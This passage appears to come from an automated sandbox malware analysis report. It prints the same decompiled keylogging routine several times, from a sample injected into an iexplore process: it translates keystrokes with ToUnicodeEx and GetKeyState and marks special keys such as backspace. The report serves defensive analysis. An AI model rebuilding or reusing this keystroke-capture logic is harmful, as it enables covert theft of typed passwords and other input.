				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C8594A, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8594A(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc860d0);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85939, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85939(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc860c8);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C858C2, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C858C2(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc86090);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85917, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85917(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc860b8);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C859C1, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C859C1(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc86160);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C858F5, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C858F5(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc860a8);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
